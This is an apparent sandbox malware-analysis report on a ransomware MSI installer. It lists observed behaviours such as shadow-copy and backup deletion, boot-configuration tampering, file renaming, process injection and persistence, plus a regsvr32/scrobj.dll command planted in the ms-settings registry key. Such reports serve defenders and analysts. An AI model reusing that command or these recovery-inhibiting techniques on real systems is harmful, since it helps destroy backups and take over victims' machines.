d1d4e29f5fca0c97cd89a4b5134d298bf2829cea92e5d116084b83d980d2c6e0

Analysis

max time kernel
193s
max time network
205s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
22-03-2022 12:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d1d4e29f5fca0c97cd89a4b5134d298.msi
Size

100KB
MD5

aebfb88d2333ee74373a4cf582682070
SHA1

3d8b0dd99846144287aeeb025a5c9fc254f66fc0
SHA256

d1d4e29f5fca0c97cd89a4b5134d298bf2829cea92e5d116084b83d980d2c6e0
SHA512

9feb73d9c4902f03b94df49b3087418473dd0826480b5fde8ba3654dd8bf22bb372c8881e5254e5e8a0f6cf78bfb2d80c9060208c66478362bc6f75f12fca8cb

Score

9^/10

evasion persistence ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 12 IoCs

ransomware evasion

Inhibit System Recovery

T1490

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
4732	bcdedit.exe
4404	bcdedit.exe
1636	bcdedit.exe
4152	bcdedit.exe
4556	bcdedit.exe
5136	bcdedit.exe
5568	bcdedit.exe
5604	bcdedit.exe
3716	bcdedit.exe
4388	bcdedit.exe
3244	bcdedit.exe
4408	bcdedit.exe

Blocklisted process makes network request 3 IoCs

Processes:

msiexec.exe

flow pid process

8 3496 msiexec.exe
9 3496 msiexec.exe
11 3496 msiexec.exe
Deletes System State backups 3 TTPs 6 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exe

pid process

5336 wbadmin.exe
5360 wbadmin.exe
5440 wbadmin.exe
1844 wbadmin.exe
1924 wbadmin.exe
4656 wbadmin.exe
Deletes backup catalog 3 TTPs 6 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exe

pid process

5208 wbadmin.exe
5328 wbadmin.exe
5256 wbadmin.exe
5640 wbadmin.exe
5536 wbadmin.exe
3516 wbadmin.exe

flow	pid	process
8	3496	msiexec.exe
9	3496	msiexec.exe
11	3496	msiexec.exe

pid	process
5336	wbadmin.exe
5360	wbadmin.exe
5440	wbadmin.exe
1844	wbadmin.exe
1924	wbadmin.exe
4656	wbadmin.exe

pid	process
5208	wbadmin.exe
5328	wbadmin.exe
5256	wbadmin.exe
5640	wbadmin.exe
5536	wbadmin.exe
3516	wbadmin.exe

Modifies extensions of user files 4 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

MsiExec.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\NewEdit.raw => C:\Users\Admin\Pictures\NewEdit.raw.tjtwhzx	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\UninstallRestart.raw => C:\Users\Admin\Pictures\UninstallRestart.raw.tjtwhzx	MsiExec.exe
File opened for modification	C:\Users\Admin\Pictures\SetPop.tiff	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\SetPop.tiff => C:\Users\Admin\Pictures\SetPop.tiff.tjtwhzx	MsiExec.exe

Loads dropped DLL 1 IoCs

Processes:

MsiExec.exe

pid process

4028 MsiExec.exe

pid	process
4028	MsiExec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

msedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

MsiExec.exe

description	pid	process	target process
PID 4028 set thread context of 2316	4028	MsiExec.exe	sihost.exe
PID 4028 set thread context of 2332	4028	MsiExec.exe	svchost.exe
PID 4028 set thread context of 2472	4028	MsiExec.exe	taskhostw.exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\3a175e52-3a2b-486e-ab7e-cb310fed9ea3.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220322121845.pma	setup.exe

Drops file in Windows directory 9 IoCs

Processes:

msiexec.exe

description	ioc	process
File created	C:\Windows\Installer\1cdc67a.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\1cdc67a.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Installer\SourceHash{F9FBBF96-A25A-4F7C-A937-484F62CA84D9}	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC83F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICEC8.tmp	msiexec.exe
File created	C:\Windows\Installer\1cdc67c.msi	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

svchost.exevds.exevssvc.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000008a0185136d91714e0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800008a0185130000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff0000000007000100006809008a018513000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000008a01851300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000008a01851300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Mfg	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid process

3644 vssadmin.exe
364 vssadmin.exe
4880 vssadmin.exe
4892 vssadmin.exe
5444 vssadmin.exe
5736 vssadmin.exe
Modifies data under HKEY_USERS 1 IoCs

Processes:

svchost.exe

description ioc process

Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe

pid	process
3644	vssadmin.exe
364	vssadmin.exe
4880	vssadmin.exe
4892	vssadmin.exe
5444	vssadmin.exe
5736	vssadmin.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe

Modifies registry class 15 IoCs

Processes:

regsvr32.exemsedge.exeregsvr32.exeregsvr32.exesihost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

msiexec.exeMsiExec.exemsedge.exemsedge.exeidentity_helper.exemsedge.exe

pid	process
3004	msiexec.exe
3004	msiexec.exe
4028	MsiExec.exe
4028	MsiExec.exe
5000	msedge.exe
5000	msedge.exe
4436	msedge.exe
4436	msedge.exe
2020	identity_helper.exe
2020	identity_helper.exe
4536	msedge.exe
4536	msedge.exe
4536	msedge.exe
4536	msedge.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

MsiExec.exe

pid process

4028 MsiExec.exe
4028 MsiExec.exe
4028 MsiExec.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

Processes:

msedge.exe

pid process

4436 msedge.exe
4436 msedge.exe
4436 msedge.exe
4436 msedge.exe
4436 msedge.exe

pid	process
4028	MsiExec.exe
4028	MsiExec.exe
4028	MsiExec.exe

pid	process
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exevssvc.exe

description	pid	process
Token: SeShutdownPrivilege	3496	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3496	msiexec.exe
Token: SeSecurityPrivilege	3004	msiexec.exe
Token: SeCreateTokenPrivilege	3496	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3496	msiexec.exe
Token: SeLockMemoryPrivilege	3496	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3496	msiexec.exe
Token: SeMachineAccountPrivilege	3496	msiexec.exe
Token: SeTcbPrivilege	3496	msiexec.exe
